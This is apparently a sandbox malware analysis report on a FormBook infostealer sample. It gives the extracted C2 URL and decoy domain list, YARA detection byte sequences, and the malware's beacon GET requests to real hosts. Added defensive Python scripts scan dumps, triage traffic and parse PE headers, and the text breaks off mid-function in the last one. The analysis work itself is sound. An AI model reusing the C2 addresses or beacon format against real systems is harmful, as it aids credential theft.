Windows Analysis Report stage4.exe

Overview

General Information

Sample Name:stage4.exe
Analysis ID:526334
MD5:17032a31243253b4fefeb5c6a9604c1f
SHA1:c6b4a5a935594c61293d8d26c2b891f4c4c02bec
SHA256:84eca147b83cc4116ebb6c34dbe60f7231c676f17152cb376d8efb913d534723
Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
PE file has a writeable .text section
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • stage4.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\stage4.exe" MD5: 17032A31243253B4FEFEB5C6A9604C1F)
    • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • explorer.exe (PID: 5700 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cscript.exe (PID: 6156 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mgav26.xyz/n8rn/"], "decoy": ["jlvip1066.com", "gconsultingfirm.com", "foundergomwef.xyz", "bredaslo.com", "ethereumpets.com", "buddymerrillmusic.com", "archdeylemmergay.com", "particulares-es.icu", "gb2022-club.com", "babypasal.com", "mlikew.com", "mskindi.com", "securewalletvalidate.com", "billstrasse24.com", "ritebet388.com", "nuhive.net", "nekomediphile.com", "jaynelsonphotog.com", "writerpilotpublishing.store", "taquerialoteria.com", "feetlover.online", "buychryslers.com", "duyol.com", "theeppunday.com", "slayfearlessly.com", "padelthiene.com", "falcongroupmanagement.com", "security-paiemet.com", "disfagiaresidencias.com", "ragworkhouse.com", "smplkindness.com", "dartsearchengine.com", "rapibest.com", "lab-design.online", "soflovrlnd.com", "pandawan.club", "purifybrush.com", "grantopwincup.website", "zenholisticstores.com", "nomarcapital.com", "thoughtultracruel.quest", "excellentdefence.com", "phillystore.net", "egregore.club", "waysgaming.com", "boliden-ab.com", "faxedfumnook.com", "ecobook.club", "ff4c75x4e.xyz", "connect01.com", "monascake.xyz", "balaga-vacances.com", "prill.quest", "princessbuilt.com", "islandresiliency.com", "dimcreadev.tech", "bspcanadaconnects.com", "hotgurlmarket.com", "spendbrasiltimebest.com", "newelectricways.com", "counterpokemon.com", "beyerenterprisestreeservice.com", "phorganicfoods.com", "hermespros.com"]}

Yara Overview

Memory Dumps

Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
      • 0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x7992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x136a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x137a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1391f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x83aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1240c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 memory dump entries in total; the remaining entries are not reproduced on this page)

      Unpacked PEs

Source: 0.2.stage4.exe.1200000.1.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
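The strings listed above are raw byte sequences, each reported with the offset at which it hit inside the dump. The Python below is an added example (not code from the Joe Sandbox report or from the rule authors) that re-implements that string-matching step without yara-python: it reports per-string offsets like `yara -s`, decodes the JPCERT/CC strings (each is a `push imm32`, opcode 0x68, of one constant), and checks that two dumps of the same code yield hits shifted by a single constant, which is what the report shows for the DD0000 and 01201000 dumps (0x8608 vs 0x7608 for sequence_0, a 0x1000 shift). Note that sequence_0 decodes to `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, the RDTSC timing check the signature list flags. The image scanned is constructed in the script (filler with a few of the strings placed at the DD0000 dump's offsets), not sample data, and the rules' `condition:` clauses are not printed on the page, so they are not reproduced.

```python
"""Re-implement the string-matching step behind the Yara hits above, without
yara-python.  Added example, not code from the report or the rule authors.
The image scanned is constructed below; the rules' condition clauses are not
known from the page and are not reproduced."""
import struct
from typing import Dict, List, Optional

# $sequence_* strings of Formbook_1 (yara-signator), copied from the report.
SIGNATOR_SEQUENCES: Dict[str, bytes] = {
    # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax: the RDTSC timing check
    "sequence_0": bytes.fromhex("03C80F312BC18945FC"),
    "sequence_1": bytes.fromhex("3C240F8476FFFFFF3C257494"),
    "sequence_2": bytes.fromhex("3B4F14739585C97491"),
    "sequence_3": bytes.fromhex("3C6975448B7D188B0F"),
    "sequence_4": bytes.fromhex("5DC38D507C80FA07"),
    "sequence_5": bytes.fromhex("0FBE5C0E010FB6540E0283E30FC1EA06"),
    "sequence_6": bytes.fromhex("578945FC8945F48945F8"),
    "sequence_7": bytes.fromhex("66890C025B8BE55D"),
    "sequence_8": bytes.fromhex("3C5474043C7475F4"),
    "sequence_9": bytes.fromhex("5668030100008D8595FEFFFF6A00"),
}
# JPCERT/CC strings: each one is 'push imm32' (opcode 0x68) of a constant.
JPCERT_PUSHES: Dict[str, bytes] = {
    "sqlite3step": bytes.fromhex("68341C7BE1"),
    "sqlite3text": bytes.fromhex("68382A90C5"),
    "sqlite3blob": bytes.fromhex("6853D87F8C"),
}


def find_all(buf: bytes, pattern: bytes) -> List[int]:
    """Every offset at which pattern occurs in buf (overlapping hits allowed)."""
    hits, start = [], 0
    while True:
        idx = buf.find(pattern, start)
        if idx == -1:
            return hits
        hits.append(idx)
        start = idx + 1


def scan(buf: bytes, strings: Dict[str, bytes]) -> Dict[str, List[int]]:
    """Offsets per string name, listing only strings that hit (like yara -s)."""
    result = {}
    for name, pat in strings.items():
        hits = find_all(buf, pat)
        if hits:
            result[name] = hits
    return result


def push_immediates(buf: bytes, hits: Dict[str, List[int]]) -> Dict[str, int]:
    """Decode the little-endian 32-bit immediate that follows opcode 0x68."""
    out = {}
    for name, offsets in hits.items():
        off = offsets[0]
        if buf[off] != 0x68:
            raise ValueError(f"{name} at {off:#x} is not a push imm32")
        out[name] = struct.unpack_from("<I", buf, off + 1)[0]
    return out


def constant_shift(a: Dict[str, List[int]], b: Dict[str, List[int]]) -> Optional[int]:
    """Return d if every hit in b equals the matching hit in a plus d, else None.
    Two dumps of the same code taken from different bases differ by such a d."""
    deltas = set()
    for name, offs_a in a.items():
        offs_b = b.get(name)
        if offs_b is None or len(offs_b) != len(offs_a):
            return None
        deltas.update(ob - oa for oa, ob in zip(offs_a, offs_b))
    return deltas.pop() if len(deltas) == 1 else None


def build_sample_image() -> bytes:
    """Constructed image (not a real dump): NOP filler with some of the strings
    placed at the offsets the report gives for the ...DD0000 dump."""
    img = bytearray(b"\x90" * 0x1B000)
    placements = [("sequence_0", 0x8608), ("sequence_0", 0x8992), ("sequence_5", 0x93AA),
                  ("sequence_8", 0x19B97), ("sqlite3step", 0x16AC9), ("sqlite3step", 0x16BDC),
                  ("sqlite3text", 0x16AF8), ("sqlite3text", 0x16C1D),
                  ("sqlite3blob", 0x16B0B), ("sqlite3blob", 0x16C33)]
    strings = {**SIGNATOR_SEQUENCES, **JPCERT_PUSHES}
    for name, off in placements:
        img[off:off + len(strings[name])] = strings[name]
    return bytes(img)


def report(buf: bytes) -> Dict[str, Dict[str, List[int]]]:
    """Per-rule string hits, in the shape of the report's Yara overview."""
    return {"Formbook_1": scan(buf, SIGNATOR_SEQUENCES),
            "Formbook (JPCERT/CC)": scan(buf, JPCERT_PUSHES)}


if __name__ == "__main__":
    image = build_sample_image()
    for rule, hits in report(image).items():
        for name, offsets in hits.items():
            print(rule, name, [hex(o) for o in offsets])
    print({k: hex(v) for k, v in push_immediates(image, scan(image, JPCERT_PUSHES)).items()})
    print(hex(constant_shift(scan(image, SIGNATOR_SEQUENCES),
                             scan(b"\0" * 0x1000 + image, SIGNATOR_SEQUENCES))))
```

On a real dump, run `report()` over the file's bytes; a consistent non-zero `constant_shift()` between two dumps is a quick way to confirm they contain the same unpacked code at different bases before spending time on either.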

        Sigma Overview

        No Sigma rule has matched

Jbx Signature Overview

        AV Detection:

Found malware configuration
Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook, configuration as reproduced under Malware Configuration above
Yara detected FormBook
Source: Yara match; file source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match; file source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: www.mgav26.xyz/n8rn/; Avira URL Cloud label: phishing
Source: http://www.egregore.club/n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP; Avira URL Cloud label: phishing
Machine Learning detection for sample
Source: stage4.exe; Joe Sandbox ML: detected
Additional static evidence (PE characteristics, PDB paths, inlined nop sequences):
Source: stage4.exe; static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: stage4.exe; static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: binary string "cscript.pdbUGP" in stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
Source: binary string "wntdll.pdbUGP" in stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, and in cscript.exe, 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp
Source: binary string "wntdll.pdb" in stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, and in cscript.exe
Source: binary string "cscript.pdb" in stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\stage4.exe; code function 0_2_01206AB4: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cscript.exe; code function 22_2_010D6AB5: 4x nop then pop ebx

        Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49830 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49833 -> 109.234.160.63:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49839 -> 168.119.175.0:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49843 -> 192.200.108.3:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; network connect: 88.99.22.5:80
Source: C:\Windows\explorer.exe; network connect: 109.234.160.63:80
Source: C:\Windows\explorer.exe; domain query: www.theeppunday.com
Source: C:\Windows\explorer.exe; domain query: www.egregore.club
Source: C:\Windows\explorer.exe; domain query: www.dartsearchengine.com
Source: C:\Windows\explorer.exe; domain query: www.feetlover.online
Source: C:\Windows\explorer.exe; network connect: 34.102.136.180:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.mgav26.xyz
C2 URLs / IPs found in malware configuration
Source: malware configuration extractor; URLs: www.mgav26.xyz/n8rn/
Source: Joe Sandbox View; ASN name: HETZNER-ASDE
Source: Joe Sandbox View; ASN name: O2SWITCHFR
Source: global traffic; HTTP traffic detected: GET /n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP HTTP/1.1; Host: www.feetlover.online; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP HTTP/1.1; Host: www.dartsearchengine.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP HTTP/1.1; Host: www.egregore.club; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: GET /n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP HTTP/1.1; Host: www.gconsultingfirm.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Mon, 22 Nov 2021 13:42:26 GMT; Content-Type: text/html; Content-Length: 275; ETag: "6193c8c9-113"; Via: 1.1 google; Connection: close; body: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Mon, 22 Nov 2021 13:43:07 GMT; Content-Type: text/html; Content-Length: 275; ETag: "618be761-113"; Via: 1.1 google; Connection: close; body: the same 275-byte "Access Forbidden" HTML as the response above
Source: explorer.exe, 0000000F.00000000.364635706.00000000086E8000.00000004.00000001.sdmp; string found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000F.00000003.349908622.0000000008844000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.366683920.0000000008844000.00000004.00000001.sdmp; string found in binary or memory: http://crl.v
Source: explorer.exe, 0000000F.00000000.317525640.0000000002BCB000.00000004.00000001.sdmp; string found in binary or memory: http://ns.adobe.cm/x
Source: unknown; DNS traffic detected: queries for www.feetlover.online
Source: stage4.exe, 00000000.00000002.395798029.0000000000E9A000.00000004.00000020.sdmp; binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
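The extracted configuration names one C2 URL (www.mgav26.xyz/n8rn/) and 64 decoy domains, and the four check-ins above all carry the C2's path /n8rn/, the same Mf3 value and no User-Agent header, but go to hosts from the decoy list; that is FormBook's usual pattern of spreading identical beacons over decoys so the real C2 does not stand out. The script below is an added example, not part of the Joe Sandbox report: it parses requests in that shape, labels each host as the configured C2, a configured decoy, or not in the configuration, and collects the query parameter values that stayed constant. The four GET requests are re-typed from the traffic section; the fifth request, its www.example.com host and the decoy subset are constructed for the example, and the meaning of Mf3 is not known from the report (it is only observed to be constant).

```python
"""Correlate the FormBook configuration the report extracted with the HTTP
check-ins seen on the wire.  Added example, not part of the Joe Sandbox
report.  The four GET requests are re-typed from the report's traffic
section; the fifth request, the www.example.com host and the decoy subset
are constructed for the example."""
from typing import Dict, List, Set

C2_URLS = ["www.mgav26.xyz/n8rn/"]  # "C2 list" from the extracted config
DECOYS = ["feetlover.online", "dartsearchengine.com", "egregore.club",   # subset of the
          "gconsultingfirm.com", "theeppunday.com", "jlvip1066.com"]   # 64 "decoy" entries

REQUESTS = [
    "GET /n8rn/?DFNPQJ=SJFr9BhJeZZyi2ucxvCICI6bRNARjPLC+tg5AUSRokV2wV+CF1rvnKzW+V2D6Rw83fT/&Mf3=f880irxXZ4UDtxoP HTTP/1.1\r\n"
    "Host: www.feetlover.online\r\nConnection: close\r\n\r\n",
    "GET /n8rn/?DFNPQJ=h1fp3Hda9mAZkqRDMBzhuAsSSpfRTgMN3yh/hpwpAz6PQ27xv5wLBHD9XtakgWKnfsj5&Mf3=f880irxXZ4UDtxoP HTTP/1.1\r\n"
    "Host: www.dartsearchengine.com\r\nConnection: close\r\n\r\n",
    "GET /n8rn/?DFNPQJ=d8Vd0KGElgAoJPayu0cFCsW2OQKpqBWJtC/s/S6e83mSkC4by6IuxE3Y1io3VmYIqXC6&Mf3=f880irxXZ4UDtxoP HTTP/1.1\r\n"
    "Host: www.egregore.club\r\nConnection: close\r\n\r\n",
    "GET /n8rn/?DFNPQJ=NdSdCS1so+jBOhKbX6Hl5r/uB2055iwTMCcKjDuiSwVFzL3wqZseOva8MEOaJLNdbnoX&Mf3=f880irxXZ4UDtxoP HTTP/1.1\r\n"
    "Host: www.gconsultingfirm.com\r\nConnection: close\r\n\r\n",
    # Constructed benign-looking request: host not in the config, has a User-Agent.
    "GET /update HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]


def strip_www(host: str) -> str:
    """Config entries omit the 'www.' label that the observed Host headers carry."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def parse_request(raw: str) -> Dict[str, object]:
    """Minimal HTTP/1.x request parser: request line, headers, raw query params.
    No URL-decoding, so '+' and '/' inside the DFNPQJ value are kept verbatim."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[key] = value
    return {"method": method, "host": headers.get("host", ""), "path": path,
            "params": params, "has_user_agent": "user-agent" in headers}


def c2_hosts() -> Set[str]:
    return {strip_www(u.split("/", 1)[0]) for u in C2_URLS}


def c2_paths() -> Set[str]:
    """The URI path part of each configured C2 URL, e.g. '/n8rn/'."""
    return {"/" + u.split("/", 1)[1] if "/" in u else "/" for u in C2_URLS}


def classify_host(host: str) -> str:
    h = strip_www(host)
    if h in c2_hosts():
        return "c2"
    if h in {strip_www(d) for d in DECOYS}:
        return "decoy"
    return "unconfigured"


def triage(requests: List[str]) -> List[Dict[str, object]]:
    """One row per request: who was contacted and whether the request has the
    FormBook shape seen in the report (configured C2 path, no User-Agent)."""
    rows = []
    for raw in requests:
        row = parse_request(raw)
        row["role"] = classify_host(row["host"])
        row["formbook_shape"] = row["path"] in c2_paths() and not row["has_user_agent"]
        rows.append(row)
    return rows


def constant_params(rows: List[Dict[str, object]], name: str = "Mf3") -> Set[str]:
    """Distinct values of one query parameter across the FormBook-shaped requests;
    a single value means it did not vary across this run's check-ins."""
    return {row["params"][name] for row in rows
            if row["formbook_shape"] and name in row["params"]}


if __name__ == "__main__":
    rows = triage(REQUESTS)
    for row in rows:
        print(f'{row["host"]:28} {row["role"]:13} path={row["path"]} '
              f'formbook_shape={row["formbook_shape"]} user_agent={row["has_user_agent"]}')
    print("Mf3 values:", constant_params(rows))
```

On a proxy or packet-capture export the same `triage()` separates decoy noise from the one host that is actually in the "C2 list", which is the host worth blocking and pivoting on; the decoys are mostly legitimate sites and blocking them wholesale causes collateral damage.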

        E-Banking Fraud:

Yara detected FormBook
Source: Yara match; the same twelve file sources (one unpacked PE and eleven memory dumps) listed under AV Detection above

        System Summary:

Malicious sample detected (through community Yara rule)
Every source below matched both community rules: "autogenerated rule brought to you by yara-signator" (author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (author: JPCERT/CC Incident Response Group).
Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE
Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY
Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY
Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY
Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY
Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY
Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY
Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORY
PE file has a writeable .text section
Source: stage4.exe; static PE information: section .text has IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: stage4.exe; static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
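The section flags quoted above, and the 32BIT_MACHINE / EXECUTABLE_IMAGE and TERMINAL_SERVER_AWARE / DYNAMIC_BASE / NX_COMPAT lines under AV Detection, are read straight from the PE headers, as are the other static findings in the signature list (non-standard section names, entry point outside standard sections, no imported functions). The Python below is an added example, not code from Joe Sandbox, that parses those headers with `struct` and raises the same four findings plus the flag names. The two images it checks are constructed in the script as header-only PE32 blobs (no section data, not sample bytes); the section name ".xyz" and the layout are placeholders, because the report does not print the sample's section table, and the sets of "standard" section names and "standard" code sections are this script's own assumptions.

```python
"""Header-only PE triage for the static signatures this report raises
(writeable .text, non-standard section names, entry point outside standard
sections, no imports).  Added example, not code from Joe Sandbox; the two
images below are constructed header-only PE32 blobs, not sample bytes."""
import struct
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

MEM_EXECUTE, MEM_WRITE, CNT_CODE = 0x20000000, 0x80000000, 0x00000020
FILE_FLAGS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x8000: "TERMINAL_SERVER_AWARE"}
# Assumption: which names count as "standard"; Joe Sandbox's own list is not published here.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".pdata", ".tls", ".bss"}
CODE_NAMES = {".text", "CODE"}


@dataclass
class Section:
    name: str
    vaddr: int
    vsize: int
    flags: int


@dataclass
class PEInfo:
    file_flags: int
    dll_flags: int
    entry_rva: int
    import_rva: int
    import_size: int
    sections: List[Section]


def parse_pe(pe: bytes) -> PEInfo:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    nt = struct.unpack_from("<I", pe, 60)[0]                      # e_lfanew
    if pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _machine, nsec, _, _, _, opt_size, file_flags = struct.unpack_from("<HHIIIHH", pe, nt + 4)
    opt = nt + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
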